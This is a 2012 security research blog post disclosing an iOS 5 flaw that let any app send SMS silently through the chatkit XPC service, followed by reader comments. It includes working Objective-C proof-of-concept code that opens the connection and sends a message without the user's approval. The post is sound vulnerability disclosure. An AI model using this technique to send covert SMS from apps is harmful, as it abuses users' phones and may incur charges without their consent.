October 24, 2012

Your Flashlight Can Send SMS — One More Reason to Update up to iOS 6

Today I'm not going to tell you how the security system of iOS 5 is organized. We will not gather bits of information using undocumented features either. We'll just send an SMS from an application behind the user's back.

There is too little information describing low-level operations on iOS. These bits do not allow viewing the picture as a whole. A lot of header files have closed sources. The majority of steps are taken blindly. MacOS X, the mobile platform ancestor, becomes the main experimental field.

One of the systems of inter-process communication in MacOS is XPC. This system layer has been developed for inter-process communication based on transfer of plist structures using libSystem and launchd. In fact, it is an interface that allows managing processes via the exchange of such structures as dictionary. Due to heredity, iOS 5 possesses this mechanism as well.

You might already understand what I mean by this introduction. Yep, there are system services in iOS that include tools for XPC communication. And I want to exemplify the work with daemon for SMS sending. However, it should be mentioned that the vulnerability is fixed in iOS 6, but is relevant for iOS 5.0—5.1.1. Jailbreak, Private Framework, and other illegal tools are not required for its exploitation. Only the set of header files from the directory /usr/include/xpc/* is needed.

One of the elements for SMS sending in iOS is the system service com.apple.chatkit, the tasks of which include generation, management, and sending of short text messages. For the ease of control, it has the publicly available communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can generate and send messages without user's approval. 

Well, let's try to create connection.
xpc_connection_t myconnection;
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now we have the XPC connection myconnection to the service of SMS sending. However, XPC configuration provides for creation of suspended connections —we need to take one more step for the activation.
xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event){
        xpc_type_t xtype = xpc_get_type(event);
        if(XPC_TYPE_ERROR == xtype)
        NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        // Always set an event handler. More on this later.
        NSLog(@"Received an message event!");

The connection is activated. Right at this moment iOS 6 will display a message in the telephone log that this type of communication is forbidden. Now we need to generate a dictionary similar to xpc_dictionary with the data required for the message sending.
NSArray *receipements = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:receipements format:200 options:0 error:NULL];

xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
xpc_connection_send_barrier(myconnection, ^{
        NSLog(@"Message has been successfully delievered");
Sound of SMS sent to a short number.
So prior to elimination of this vulnerability in iOS 6, any application could send SMS without user's approval. Apple has provided iOS 6 with one more security layer, which prevents connections to the service from a sandbox.

Thank you for attention!

Author: Kirill Ermakov, Positive Research.


  1. Hi this is the first time I have visited this. I want to ask you a question about this blog does what you describe mean that an application can "easily" send sms without the owner's knowledge? Some of my family members have iPhones and not all of them have updated to iOS 6 will applications still be able to send sms even though they still have iOS 5?

    Well that is how I understood your blog but I wanted to make sure?

    Besides my questions I think your blog is great (even though I have only read two of your blogs :P) and you are very good at explaining the problems with text and backing it up with the reasons behind these problems so great job, keep up the good work :)

    1. Hi, thanks! This ability works on all iOS 5 devices.
      As I told, it is fixed in iOS 6.

  2. nice thought and nice blog dude,your idea awesome for explaining about sending msgs in i phone.so many soft ware related ideas you shared all da bst dude,
    SendBulk SMS text messages to India from your pc web or application you will got bulk pricing discounts Bulk sms provider
    sms Discounts

  3. This comment has been removed by a blog administrator.

  4. This comment has been removed by a blog administrator.

  5. This comment has been removed by a blog administrator.

  6. This comment has been removed by a blog administrator.

  7. This comment has been removed by a blog administrator.

  8. This comment has been removed by a blog administrator.